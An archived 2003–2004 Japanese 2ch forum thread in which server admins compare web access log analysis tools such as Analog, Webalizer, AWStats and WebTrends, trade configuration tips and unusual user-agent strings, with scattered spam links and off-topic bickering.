5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

アクセスログ解析

1 :DNS未登録さん:03/05/23 16:43 ID:66Evzh7x
ログ解析について語りませんか?
変なAgentがあったとか、謎のリクエストなど

あと解析ソフトもね。オレはサーバー上で解析する気は無いので
ApacheLogViewerというのを使ってるよ、これは凄い
速いし高機能だしお奨めだ。

2 :DNS未登録さん:03/05/23 16:49 ID:JCfeb53J
2?

3 :DNS未登録さん:03/05/23 16:50 ID:sqlZx4Fz
私もApacheLogViewer使ってます
質問なんですが、これって何ですか?
"","-",-,"","-",408,0,"-","-"
default.ida","XXXXX
"-",HEAD,"/","-",200,0,"-","-"
"","-",GET,"http://www.yahoo.com/","-",200,1726,"-",
下の2つは200なので気になるんですけど

4 :DNS未登録さん:03/05/23 16:55 ID:ZRRl9EEG
この間、アクセス解析してたら素敵ングブラウザに出会いました

5 :DNS未登録さん:03/05/23 17:18 ID:???
Postfixのログを解析するソフトを教えてください。

6 :演@ usen-43x233x52x230.ap-USEN.usen.ad.jp:03/05/23 20:40 ID:???
analogで十分。

7 :DNS未登録さん:03/05/23 21:43 ID:???
ApacheLogViewerなんだけど、初めは愛用してたけど、今はWebAlizerだなぁ。
だってLogViewerだと読み込んで表示されるのに15分ぐらいかかるんだもん。
日/40万リクで、一週間分となるともう絶望的。



8 :DNS未登録さん:03/05/24 01:27 ID:???
>>7
analogとWebAlizer併用が最強

9 :DNS未登録さん:03/05/24 01:30 ID:???
ルータのログ解析にclscanとfwlogwatch使ってます

10 :DNS未登録さん:03/05/25 23:08 ID:???
AWStatsが結構見やすくて良いッス

11 :山崎渉:03/05/28 17:04 ID:???
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

12 :DNS未登録さん:03/05/30 06:32 ID:Z9dUcAJg




1の母です1の父です1の兄です1の弟です1の姉です1の妹です1の祖父です
1の祖母です1の伯父です1の伯母です1の叔父です1の叔母です1の曾祖父です
1の甥です1の姪です1の従兄です1の従姉です1の従弟です1の従妹です
1の曾祖母です1の息子です1の娘です1の孫です1の曾孫です1の玄孫です
1の消防時のクラスメイトです1の消防時の担任です1の卒業消学校の校長です
1の今(厨房時)のクラスメイトです1の今の担任です1の現厨学校の校長です
1の家臣です1の御家人です1の右大臣です1の左大臣です
1の主治医です1の看護婦です1の入院している病院の院長です
1の背後霊です1の家に居る呪縛霊です1の先祖です1の家の仏壇です
1の使用ストUキャラです1がやってるDQの主人公です1がやってるFFの主人公です
1のエクソシストです1の占い師です1の体内に金属片を埋めた宇宙人です
1のPCです1のMOです1のマウスです1のキーボードです1のプリンターです
1の精子です1のティムポです1のチン毛です1のティムポの皮です1のティンカスです
1が毎日オナーニする時に使っている布です1の胸毛です1の脇毛です1の鼻毛です
1のツアー添乗員です1を泊めた宿の主人です1を泊めた宿の女将です
1の先輩です1の後輩です1を轢いたトラックです1を中央線三鷹駅で轢いた電車の運転士です

 今 回 は 1 が こ の よ う な ス レ ッ ド を 立 て て し ま い 誠 に 申 し 訳

 ご ざ い ま せ ん。 こ の 板 の 住 人 の 方 々 に 深 く お 詫 び し ま す。



13 :DNS未登録さん:03/05/30 07:00 ID:m7Ux4xah
ネット上で自分の分身キャラ「アバター」を作って楽しくコミュニケーション
無料登録すると、もれなく商品券とメールアドレスが貰えます!!         
http://f15.aaacafe.ne.jp/~suikas/cafe.html

14 :直リン:03/05/30 07:10 ID:9hpAtb09
http://homepage.mac.com/yuuka20/

15 :DNS未登録さん:03/05/30 10:47 ID:j4qrs68+
サーバーはIISで、50以上あるサイトのアクセス数レポートを、
毎月1回お客さんにメールで送ってるんだよ。
で、アクセス解析ソフトをこれまで「WebLOG」っていうフリーソフトを使ってたんだが、
もうパワーの限界がきてる。
サーバーに負荷をかけたくないからクライアントで動作して、
なおかつ定期的に50以上のサイトのログを一気に解析してくれるようなソフトありませんかね?
今あたりをつけてるのは「NetIntellect」とかいうソフト。
どうなんだろ?

16 :DNS未登録さん:03/05/30 11:07 ID:???
有料でもいいならWebTrend

17 :16:03/05/30 11:08 ID:???
あとは解析用の鯖を別にする。

18 :直リン:03/05/30 11:10 ID:9hpAtb09
http://homepage.mac.com/yuuka20/

19 :15:03/05/30 11:28 ID:j4qrs68+
>16
おーすげー!
レポートを自動でメールで送ってくれるみたいだ!
まさに待ち望んでたものかも。

しかしgoogleしたところ、
二つの会社がやってるみたいだ?
どう違うんだ?
http://www.xlsoft.com/jp/products/webtrends/price.html
http://www.terilogy.co.jp/product/security/webtrends/analysis.htm

20 :16:03/05/30 12:03 ID:???
>>19
販売代理店が複数あるってだけ。
昔は日本語マニュアルがショボくて大変だったけど今はだいぶマシになったんじゃないかな。
Ver5.5使ってた経験から参考意見。

・けっこう初期設定(レポートのポリシー作成)はめんどい。
 これはバージョン関係ないと思う。
・ログの件数にもよるんだけど、サーバ側で日付変更線のタイミングで
 ログ分割&圧縮かけといたほうがいいかも。
・HTML出力でもけっこう見やすいけど、Excelで出力できるのは
 提出資料作成するのに便利だった(それをメールで送れるし
・サイト上にHTML出力もできるのでベーシック認証でもかけて
 クライアントに公開するって手もありかも。
・今のバージョンだと日付選択がすげー楽になった(5.5はリスト化機能なかった)。

って感じ。

21 :15:03/05/30 12:56 ID:j4qrs68+
>>・HTML出力でもけっこう見やすいけど、Excelで出力できるのは
>> 提出資料作成するのに便利だった(それをメールで送れるし
>>・サイト上にHTML出力もできるのでベーシック認証でもかけて
>> クライアントに公開するって手もありかも。
同じような仕事してるっぽくて参考になります。
とりあえず資料請求しときました。

22 :動画直リン:03/05/30 13:10 ID:9hpAtb09
http://homepage.mac.com/hitomi18/

23 :_:03/05/30 13:15 ID:???
http://homepage.mac.com/hiroyuki43/jaz01.html

24 :16:03/05/30 13:27 ID:???
レポートのポリシー作成しっかりやっとけば、
見栄えなんかもかなりカスタマイズできるよ。

>同じような仕事
ポータルサイトの鯖缶だったんで広告の出向元に出す資料作成とか。
クリックレートや訪問者分析とかまで必要になると
WebTrendに限らずサーバログの解析じゃ不可能なんで
CGIでもなんでも、クッキー使って独自にログ生成しないと無理。
その場合自鯖だと負荷デカすぎるので、
別鯖にログ生成&解析は処理させるのが一般的じゃないかな。

最初からこれ張ればよかった。
http://www.gamiras.com/admin/analyz/04.html

これ以上は板違いかな。Web制作/WebProg板?

25 :DNS未登録さん:03/05/30 13:41 ID:???
ヤプーは毎日10億行のヒットログがある。
64bit鯖で6時間掛けて解析して、広告主にレポするとか。


26 :DNS未登録さん:03/06/09 13:55 ID:???
WebTrends欲しいけど、個人じゃちょっと買えないよなぁ。
理想を言えばオープンソースで無償で入手できる似たような解析ソフトが欲しい。


27 :16:03/06/10 13:27 ID:???
商用だとWebTrendかNetintellectのどっちかだろな・・・
国産でASPではなくいい解析ソフトとかないのかな。

28 :DNS未登録さん:03/06/12 02:04 ID:???
コピーされちゃうからね。

WebTrendは固有IDがあるしなぁ。

29 :DNS未登録さん:03/06/13 14:25 ID:???
AWStatsは日本語いけるよ。

30 :DNS未登録さん:03/06/15 21:52 ID:iE6mWtYg
apacheのログを毎日ローテートしてるんですが
Webalizerで全部のログを解析するには
LogFileにどのような指定をすればいいですか?
現在 /var/log/httpd/access_log.* としていますが
どうやらワイルドカードが使えないらしく駄目でした。
Analogはこれで処理できたんですが・・・。

ログは日毎に、access_log.20030613のようになってきます。

31 :DNS未登録さん:03/06/15 22:00 ID:???
Quid Pro QuoとAnalogなんだがどうやって設定していいのか分からず鬱になり挫折した日を思い出す…

32 :DNS未登録さん:03/06/15 22:13 ID:rrNAenRc
port434,435,1434って何に使ってんだ?
変なアクセスログ残ってるけど、ネットで調べても該当するものが見つからん


33 :DNS未登録さん:03/06/15 22:15 ID:???
>>32
mobileip-agent 434/tcp MobileIP-Agent
mobileip-agent 434/udp MobileIP-Agent
mobilip-mn 435/tcp MobilIP-MN
mobilip-mn 435/udp MobilIP-MN
ms-sql-m 1434/tcp Microsoft-SQL-Monitor
ms-sql-m 1434/udp Microsoft-SQL-Monitor

34 :DNS未登録さん:03/06/15 22:23 ID:???
>>30
/var/log/httpd/access_log.20030613
/var/log/httpd/access_log.20030612
/var/log/httpd/access_log.20030611
と、新しい順に

35 :DNS未登録さん:03/06/16 00:49 ID:???
不正アクセスの発信地の国別統計をとろう!
ttp://www.mtl.t.u-tokyo.ac.jp/~nminoru/memo/ip-address/what_country_from.html

36 :DNS未登録さん:03/06/16 21:22 ID:16NrwGv5
AN HTTPDのログ解説ソフトって無いの?

37 :DNS未登録さん:03/06/16 21:24 ID:???
ログを解説するソフトか。。
難しい事を言いますね

apachelogviewer簡単だから使えば?

38 :DNS未登録さん:03/06/17 00:50 ID:???
AnHttpdのログをapache互換の形式に変換してくれる素晴らしいPerlスクリプトとかが
あれば……とっくに有名になってるか。

39 :DNS未登録さん:03/06/17 00:52 ID:???
Analogでも設定すれば使えるんじゃないの?
ttp://jp.analog.cx/jp5.24/logfmt.html

40 :DNS未登録さん:03/06/17 00:55 ID:???
ANならアクセス多いわけないんだから
>>37使えばいいでしょ
そのまま使えるんだし

41 :DNS未登録さん:03/06/17 02:56 ID:???
>>38
ANHTTPdで採用されてるのは
世界標準のcommon形式だが・・・
Apacheでも同じだろ?

42 :損権厨房 ◆mVeUbtZCI. :03/06/18 19:43 ID:UZTfDoxT
>>31
QQPの設定の所でアクセスログの記録方法ってあるだろ?
そこでcommonなりcombineなり好きなのを選べば良い
あとたまったログをAnalogにDDすればできると思うぞ

やったことはねーけどな

43 :損権厨房 ◆mVeUbtZCI. :03/06/18 19:43 ID:???
すまん、間違えた
逝って来ます

44 :_:03/06/18 20:45 ID:???
http://homepage.mac.com/hiroyuki44/

45 :直リン:03/06/18 22:10 ID:rIOl8jgG
http://homepage.mac.com/yuuka20/

46 :DNS未登録さん:03/06/19 20:48 ID:???
>>42
最初Commonで試したらうまくいったんだけど漏れの場合ログの書式が
04/09/317:22:07OKahya.gorua.org/index.html1133Mozilla/3.0GEThttp://REFERER
と2桁の年/月/日(タブ)時:分:秒(タブ)OKかERR(タブ)アクセス元ホスト(タブ)要求
されたファイル(タブ)転送バイト数(タブ)UA(タブ)ステータス(タブ)あればリファ

ってなっててそれを変えたくなかったのでいろいろ苦戦して挫折したんですYO…。あぁ…。

47 :DNS未登録さん:03/06/23 00:34 ID:7Sxj9qmI
アクセスログ解析すると何がわかるんだ?
ヒッキーが日中に頻繁にアクセスしてるぞ、とか
掲示板でいつもコピペ荒らししてるのはこいつだ、とか
その位しか分からないだろ?

他になんかいい活用法あるのですか
誰か教えてちょんまげ

48 :DNC未登録さん:03/06/23 00:55 ID:BClIUmWj
FreeBSD ipfwに使えるフリーの解析ソフトある?
fwlogwatch使ったことないけど、ipfwでも使えるのかな。

49 :DNS未登録さん:03/06/23 07:59 ID:???
>>47
ある程度混み合って来た時、サーバーの負荷を見る時ぐらいしか役に立たないな。
しかも事後だから即応性はないけどね。

あと、403とか401とか500とか503とかそういうエラーコードが出てないかチェックする事ぐらいか。


50 :DNS未登録さん:03/06/24 22:00 ID:???
>>47
そういった用途しかピンとこないお前のようなヤシには
アクセス解析などという言葉は無縁だということだ。

51 :DNS未登録さん:03/06/24 22:42 ID:???
>>50
じゃあ、君はどうアクセス解析してるの?後学のために訊かせてね。


52 :DNS未登録さん:03/06/24 23:25 ID:???
>>51
お前みたいなキモイやつがアクセスしてないか
調べるためだよ。

53 :DNS未登録さん:03/06/24 23:31 ID:???
>>50,52 のような揚げ足厨が一番キモイのだが・・・
こう言う奴のアクセスを調べて、
度が過ぎる場合に規制をかけるのは意味がありそうだな。

54 :DNS未登録さん:03/06/24 23:36 ID:???
最初から素直に教えてくださいって言えばいいのに

55 :DNS未登録さん:03/06/24 23:37 ID:???
>>53
お前やっぱりキモイわ(w

56 :DNS未登録さん:03/06/25 00:07 ID:???
>>53
おいお前、相変わらず必死だな。

57 :DNS未登録さん:03/06/25 00:09 ID:???
>>53
よかったな。
アクセス解析の目的の1つは理解できたじゃないか。
めでたいめでたい、皆の衆、赤飯炊いて祝おうではないか。
リア消卒業ぢゃて。ギャハ。

58 :DNS未登録さん:03/06/25 00:11 ID:???
>>53
いいかげん寝ろよ。
明日も早いんだろ?

59 :DNS未登録さん:03/06/25 00:13 ID:bE/AxaMj
この板もID強制表示した方がいいな。

60 :DNS未登録さん:03/06/25 00:17 ID:???
>>59
あまり意味ないと思われ。
IP変えればIDも変わるからね。
IP変えるなんて簡単だしさ。。。

61 :DNS未登録さん:03/06/25 00:37 ID:???
この板は固定IPの人が多いから

62 :DNS未登録さん:03/06/25 00:47 ID:???
ダイヤラーがいれば無意味

63 :DNS未登録さん:03/06/25 00:56 ID:???
ダイヤラーはIP強制表示だな。
IPが多少変わっても自作自演は分かるだろ。
クッシーは弾けばいいし。

64 :DNS未登録さん:03/06/25 06:04 ID:???
>>57
なんか、頭でっかちが紛れ込んでるな。


65 :DNS未登録さん:03/06/25 11:10 ID:???
おまいらもちつけ

66 :DNS未登録さん:03/06/25 12:35 ID:???
結局アクセス解析なんてキモイオタの自己満足なんだろ?
誰もまともに説明できないし。

67 :DNS未登録さん:03/06/25 12:56 ID:???
>結局アクセス解析なんてキモイオタの自己満足なんだろ?

とでも書けば、誰か説明してくれるとでも思ったのか(w

68 :演@ usen-43x233x52x230.ap-USEN.usen.ad.jp:03/06/25 13:18 ID:???
自己満足にならないようにするための材料にするのがアクセス解析じゃないの?

69 :DNS未登録さん:03/06/25 18:40 ID:???
>>67
うまい!

70 :DNS未登録さん:03/06/25 18:59 ID:wfI9oVW0
超過激ライブチャット登場!!!!!

あなたの命令で若い娘たちがヌレヌレモードへ

☆★アメリカ西海岸発☆★モザイクなし☆★☆★
・・・・・
あなたの言葉で・・・ヌードにさせてください
あなたの指で・・・感じさせてください
あなたの声で・・・イ・カ・セ・テ・ください
寂しがりやの留学生の若い娘がお待ちしております!

ただいま、10分間無料で体験できるほか7日間会費無料!!

http://www.gals-cafe.com

71 :DNS未登録さん:03/06/25 19:11 ID:???
正直、このスレッドをアクセス解析してみたいね。
煽りの殆んどは同一人物の予感・・・・

72 :DNS未登録さん:03/06/25 21:20 ID:0mc6VtBd
エロりんく
http://www.k-514.com/html/erolink.html

73 :DNS未登録さん:03/06/26 02:37 ID:???
最近Analogとdnstran使い始めてみたんですが、いつのまにかaccess_log.swpとかいうファイルがApacheのログディレクトリにできてました。
これってなんでしょう? 中身はバイナリのようです。
LOGFILE access_log* としてるとそのファイルまで引っかかって毎回エラー吐くのでなんとかしたいんですが。

74 :DNS未登録さん:03/06/29 13:14 ID:???
ReportMagicをWin32で、グラフ中の文字列が化けない方法って無いでしょうか。
FontでMS UI Gothic等を指定しても見事に化けます

75 :DNS未登録さん:03/07/03 03:09 ID:???
NetBSD1.6, Apache、で細々と鯖遊びしています。
先月分のlogをAnalogで調べたらドメインレポートのところに
.mil (米国軍事機関)
ってのがあって、ちょっとドキッとした。

76 :山崎 渉:03/07/15 11:10 ID:???

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

77 :ぼるじょあ ◆ySd1dMH5Gk :03/08/02 05:04 ID:???
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

78 :DNS未登録さん:03/08/05 00:03 ID:db8NSOVu
こういうagentがありましたよw
"bakajane-no"

79 :演@ usen-43x233x52x230.ap-USEN.usen.ad.jp:03/08/05 00:07 ID:???
>>78
http://www.gamiras.com/misc/20030805.gif

80 :DNS未登録さん:03/08/05 00:09 ID:???
user agentを書き換えて遊ぶ馬鹿は(ry

81 :DNS未登録さん:03/08/05 16:57 ID:???
>>80
逝ってよし、でつか。

漏れのはブラウザのUAの後ろに/Monagatorってつけてたりする
(ブラウザを2ちゃん風に改造したしw)

82 :DNS未登録さん:03/08/05 17:39 ID:Tb8gLAoY
IE    90%
NS    7%
その他 3%

なもんじゃないか。
その他に何が入ってるのか見る気にもならん

83 :DNS未登録さん:03/08/05 18:17 ID:???
>>82
携帯電話ブラウザかテキストブラウザ…まあそんなとこだと思われ

84 :DNS未登録さん:03/08/05 19:02 ID:???
>>83
Operaも・・・

85 :DNS未登録さん:03/08/05 22:10 ID:???
うちのアクセスログにこんなん在ったぞ

Mozilla/3.0 (DreamPassport/3.0)
Mozilla/3.0 (DreamPassport/3.15; SEGA/VF.NET)
Mozilla/3.0 (DreamPassport/3.15; SONICTEAM/PSOV2)
Mozilla/3.0 (DreamPassport/3.2)
Mozilla/3.0 (Planetweb/v1.06 Build 141; SPS JP)
Mozilla/3.0 (Planetweb/v1.54; SPS JP)
Mozilla/3.0 (compatible; PerMan Surfer 3.0; Win95)

うそくさ

Mozilla/4.0 (compatible; MSIE 5.01; Windows 95; Yahoo! JAPAN Version Windows 95/NT CD-ROM Edition 1.0.)
これはちょっと笑ったけど:D

86 :こんなのありました:03/08/05 22:13 ID:???
? (Zeonic/0079(CharCustom; YMS-14; Gelgoog;))
? (SpaceBison/0.01 [fu] (Win67; X; ShonenKnife))

87 :DNS未登録さん:03/08/05 23:31 ID:???
arpaってのもある。


88 :DNS未登録さん:03/08/06 01:17 ID:???
>>86
SpaceBisonはProxomitronの古いバージョンでUser-Agent偽装に使われてたやつ

89 :DNS未登録さん:03/08/06 06:57 ID:???
Proxomitronってなんかリファに少年ナイフのサイトのURL残して行くやつだったっけ?

90 :DNS未登録さん:03/08/06 14:46 ID:???
それで少年ナイフ関係から苦情来てもうやめたらし

91 :DNS未登録さん:03/08/06 18:22 ID:???
>85
>Mozilla/3.0 (DreamPassport/3.0)
>Mozilla/3.0 (DreamPassport/3.15; SEGA/VF.NET)
>Mozilla/3.0 (DreamPassport/3.15; SONICTEAM/PSOV2)
>Mozilla/3.0 (DreamPassport/3.2)

これはSEGAのゲーム機ドリームキャスト(DC)からののアクセスだな
通信可能なゲームにいくつかブラウザが付いてるのもある
OSはWindowsCEだったような気がする

92 :85:03/08/06 23:55 ID:???
>>91
いや知ってるけど…
問題は*未だに使ってる奴いるのかよ* って事で
#そおいやぁDCだけで作ったWebページとかDCでチャットしてるつわものとか居たなぁ


93 :DNS未登録さん:03/08/07 07:15 ID:???
まあ無理矢理使ってる理由の中にゲーム機だからウイルスに感染しねーダロってのをどっかの本かなんかで見た

94 :山崎 渉:03/08/15 22:40 ID:???
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

95 :DNS未登録さん:03/09/18 04:37 ID:???
保守った方がいいのかな。


96 :DNS未登録さん:03/09/18 10:57 ID:???
ネタないけどな

97 :DNS未登録さん:03/10/07 06:26 ID:4uI+725O
ちちんぷいぷい

98 :DNS未登録さん:03/10/07 13:07 ID:???
ぷるるんぷるん

99 :DNS未登録さん:03/10/08 07:34 ID:???
馬鹿ばっか

100 :DNS未登録さん:03/10/08 11:59 ID:???
あなたの一番になりたい

101 :名無しさん:03/10/09 14:45 ID:/LimsyLa
ブラウザからのアクセスとダウンローダーからのアクセスの
見分け方は?

102 :DNS未登録さん:03/10/09 14:58 ID:???
>>101
勘と経験から判断

103 :DNS未登録さん:03/10/09 18:43 ID:???
>>101
UAから判断できることが多いが偽装している場合は経験から…(ry
例えば数十のファイルをほぼ同時にダウソ開始とか

104 :名無しさん:03/10/14 20:09 ID:???
ふう・・・知ってる人でもたぶん教えてくれない
だろうなあと思ってました。

バラしたらその裏をすぐかかれますから。
モームス画像の大量ダウンロードはあきらめ、
こつこつ一つずつ落とすことにします。

105 :DNS未登録さん:03/10/14 20:57 ID:???
>>104
ヽ( ゚д゚)ノバーヤ

106 :DNS未登録さん:03/12/16 09:00 ID:???
にゅう

107 :DNS未登録さん:03/12/17 23:26 ID:aO0ZtV2J
知人に2ちゃんねるに出入りしてることを隠しておきたいんだが、
知人のホムペ行く前に接続しなおしたらログ解析されない?

108 :DNS未登録さん:03/12/18 00:22 ID:???
( ゚д゚)ポカーン

109 :DNS未登録さん:03/12/18 03:51 ID:???
>>107
その知人のとこは2chで晒されまくっとるのですか(わ


110 :DNS未登録さん:03/12/18 05:19 ID:72gsME6T
>>109
なぜ?ごく一般のページです。
リアル知人でもあるから隠しておきたいだけですよ。
再接続で出来るなら。

111 :DNS未登録さん:03/12/18 05:29 ID:???
>>110
リファラばぐ付きのIE使ってなけりゃ大丈夫再接続なんかせんでも大丈夫




112 :DNS未登録さん:03/12/18 05:38 ID:???
アクセスログ見ると未だにありえないサイトのURL入ったリファラがたまに残ってたりするんだけど、
あのバグって直ってるの?

113 :DNS未登録さん:03/12/18 05:54 ID:???
まだ治ってへんちゃうの?
未だにいっぱいあるもん。
リファラーに画像のURLがあったりするし。


114 :DNS未登録さん:03/12/18 06:05 ID:???
そのありえないのが入ってる奴のブラウザは何になってるよ?


115 :DNS未登録さん:03/12/18 23:46 ID:???
>>111
例えばお気に入りに2chを入れてた場合、2chの次に知人Aのホムペ訪問。
知人A「こいつ2chネラーかよ!」となるかと思ってた訳ですよ。
アクセスログって自分のホムペにアクセスした人が、どのサイトから来たとか
お気に入りは何なのかとか把握されるものかと思ってたんだけど違うのかな。

116 :DNS未登録さん:03/12/18 23:55 ID:???
>>115
それは本来はリンクをたどったときだけブラウザーが送るリファラーでわかるもの

ブラウザがバグってた時に特定の手順を踏むとリンクしてないのにそれまで表示してたページがリファラになってしまうというのがあった
IE6では直ってることになってるんだが >>112 >>113 のログに残ってるブラウザの種類に興味津々


117 :DNS未登録さん:03/12/19 00:41 ID:???
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 


厨カエレ

118 :DNS未登録さん:03/12/19 02:29 ID:???
俺の解析にゃ2chのスレがリファになったヤシがたまにある。
殆どのヤシはime.nu経由で元スレが解からないが、何百件に1件は
リファ引っ下げてアクセスしてくるヤシがいるって事。
で、そのスレにアクセスするとURLはh抜きで書かれているのね。
確かIE5.0以降に多いんじゃなかったっけか?
ほれ、直前まで見ていたページが次に表示したページに対するリファに
なっちまうバグ。今のIE6.0にはこのバグは完全になくなっていると聞いたが。

119 :DNS未登録さん:03/12/19 04:12 ID:???
>>118
IE5だか5.5のばぐっしょ
だからそのログのユーザーエージェントは何になってんのよ?
って、もしかしてユーザーエージェントをログって無いのか


120 :118(だが112や113とは別人):03/12/19 05:00 ID:???
何故そげに知りたがるのか、それが知りたいんだが。

121 :DNS未登録さん:03/12/19 05:39 ID:???
>>120
もしIE6が混じってたらバグが直ってないということだから


122 :DNS未登録さん:03/12/19 06:52 ID:???
知りたいっつーても最近ので一月も前だからなぁ、覚えてないよ。
ゴメソ。
でもIE6.0じゃなかった事は覚えてる。

123 :DNS未登録さん:03/12/19 07:13 ID:???
>>117
初心者板から来たが、おまいDQN?

124 :DNS未登録さん:03/12/19 07:17 ID:???
>>123
どのスレよ?

125 :DNS未登録さん:03/12/19 08:41 ID:???
>>123
まー同じ単語を列挙するヤシは2chのいたる所に蔓延っているが、みなDQNだ。
つかそんな事誰でも知ってるからあえて言う必要もないのに。。。

126 :DNS未登録さん:03/12/19 08:47 ID:???
>>124
ほれ
http://etc.2ch.net/test/read.cgi/qa/1071779441/

>>125
みなDQN?からかう為に使う奴もいるだろ。

127 :DNS未登録さん:03/12/19 14:05 ID:???
>>126
凄い偶然だな。本当に115じゃないのか?

99 :ひよこ名無しさん :03/12/19 06:55
マジ質問です。
2chではホームページのことを何と書けば叩かれないんですか?

102 :2ワラタ ◆BZSHO/ubtg :03/12/19 06:56
普通に叩かれないだろw
「ホームページ」でおk。

104 :ひよこ名無しさん :03/12/19 06:56
>>102
ご回答ありがとう。じゃあHPはどうですか?

105 :高校性コテ@クリスマスまであと5日 ◆KOKOrp6.b6 :03/12/19 06:56
>>99
普通にホームページだな
2chっぽくHPとか書くと逆に叩かれる(笑

108 :ひよこ名無しさん :03/12/19 06:57
>>105
んー・・・じゃあホムペはどうですか?

111 :ひよこ名無しさん :03/12/19 06:57
>>99
そんなんで叩いてるアホは無視しろ。
ウェブサイトとでも言っとけ。

116 :2ワラタ ◆BZSHO/ubtg :03/12/19 06:58
ホームページの言い方一つで叩いてくるような香具師はさすがにいないと思うからなんでもおk

120 :ひよこ名無しさん :03/12/19 06:59
>>111 >>116
ありがとう。感謝します。

128 :DNS未登録さん:03/12/19 14:05 ID:???
122 :まこと 3さい ◆siA2qltSFw :03/12/19 06:59
ホームページ、ホムペ、HP、ウェブサイト、サイト

125 :ひよこ名無しさん :03/12/19 07:00
>>99

馬鹿じゃねぇのwwwwwwwホームページだってよぉwwwwwwwwww

138 :ひよこ名無しさん :03/12/19 07:03
>>120
おまいまさか、このスレの奴じゃねーだろうな?
http://pc2.2ch.net/test/read.cgi/mysv/1053675792/l50

そこの117でホムペと書いた奴が叩かれてるんだが。

151 :ひよこ名無しさん :03/12/19 07:07
>>138
違いますよw
そんな人もいるんですねぇ…やっぱりウェブサイトかな。

158 :ひよこ名無しさん :03/12/19 07:09
>>151
それでいいだろ。しかしさすが自作PC板だな。


117 :DNS未登録さん :03/12/19 00:41 ID:???
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 
ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ ホムペ 


厨カエレ

164 :ひよこ名無しさん :03/12/19 07:11
>>158
自作PC板?自宅サーバーだろ

166 :ひよこ名無しさん :03/12/19 07:12
>>164
あ、本当だ・・・。自宅サーバーのほうが厨は多そうだがな。


最後がまた凄い偏見

129 :DNS未登録さん:03/12/19 19:24 ID:???
ホムペとか言ってる厨が大量に釣られてるな

130 :DNS未登録さん:03/12/19 21:23 ID:???
かっこわりぃ奴だな・・・

131 :DNS未登録さん:03/12/19 21:42 ID:???
なんかさ、ちょっとだけなんか詳しい奴って、物凄いカタルのな。
オレなんかそんなののせいで会社クビになったよ。でもオレ、クビになる前に数千万
手にしたから何とかなってるけどさ。これからどうしようかな。。。

132 :DNS未登録さん:03/12/20 05:08 ID:???
大量杉
いつからこんな厨ばかり増えたんだかな

133 :DNS未登録さん:03/12/20 06:07 ID:???
厨(>>117)が厨(123以後)を呼んだか・・・割と良スレだったのになぁ

134 :DNS未登録さん:03/12/20 06:08 ID:???
ちょっとだけ詳しいやつは自分の知ってることが全てだとおもってて、内容もすぐ語り尽くせちゃうからすぐ語る
詳しく分かってくるとだんだん一口で語れなくなってくるからよっぽど暇じゃないと口出ししなくなって
傍目にはよくわかってない奴みたく見えてくる(笑


135 :DNS未登録さん:03/12/23 21:30 ID:D2UuBeaM
Analogって過去のデータを蓄積しないの?
なんかログファイルがある分しか解析されて無いみたいなんだけど。

現在、一日ごとにログファイル切り出してるんだけど、数年のデータ見るには
365x年数分のファイルを毎回処理しなければならないって事ですか?

136 :DNS未登録さん:03/12/23 23:00 ID:???
多分そうだろ。
つかオプションとかあるんじゃねーのかな?

137 :DNS未登録さん:03/12/25 06:00 ID:???
>>135
過去の集計データを保存するオプションがあったはづ。
漏れはWebalizer使いだが、Webalizerにもあるよ。


138 :DNS未登録さん:03/12/25 06:10 ID:???
>>137
そのイカれた日本語なんとかしてくれ

139 :DNS未登録さん:04/01/15 04:48 ID:???
139

140 :DNS未登録さん:04/01/27 23:03 ID:???
140

141 :DNS未登録さん:04/02/04 01:24 ID:???
Webalizerですが、なぜかログの保存場所
(例えばhttp://localhost/usage/)にアクセスしても白紙の画面で
個々のファイルにアクセスしないと解析が表示されません。

どうしてかわかりませんか?

142 :DNS未登録さん:04/02/04 02:22 ID:???
わかるけどおしえない

143 :DNS未登録さん:04/02/04 02:31 ID:???
>>141
WebalizerじゃなくてApacheの設定?

144 :DNS未登録さん:04/02/04 10:43 ID:???
>>143
Apacheの設定とは?

145 :DNS未登録さん:04/02/15 19:57 ID:???
みなさん、usageはフォルダ名は変えてますか?

146 :DNS未登録さん:04/02/16 01:39 ID:???
>>141
亀レスだけど、IE使ってるなら エンコード→自動選択 してみれ。

147 :DNS未登録さん:04/02/16 01:40 ID:???
ちなみに>>145
漏れは /webalizer/ にしてるなあ。

148 :DNS未登録さん:04/02/27 14:30 ID:jBxdVAfP
webalizerと同等、またはそれ以上の機能があり
(HTML以外の画像ファイルなどに貼られたリンクをユーザーがクリックした数もわかる)
かつwebalizerよりもサーバー負荷が小さいアクセス解析ソフトがありましたら
教えてください。

OS:FreeBSD4.8
www:Apache2.x


149 :DNS未登録さん:04/02/27 15:07 ID:UpX88eng
>>145
フォルダ名は変えてないけどLan内からしか見られない設定してまつ。

150 :DNS未登録さん:04/02/27 17:05 ID:???
上に同じ

151 :DNS未登録さん:04/02/27 21:54 ID:???
>>148
WebAlizerが一番負荷が軽いと思うのだが。


152 :DNS未登録さん:04/02/28 14:03 ID:M4M39N/Y


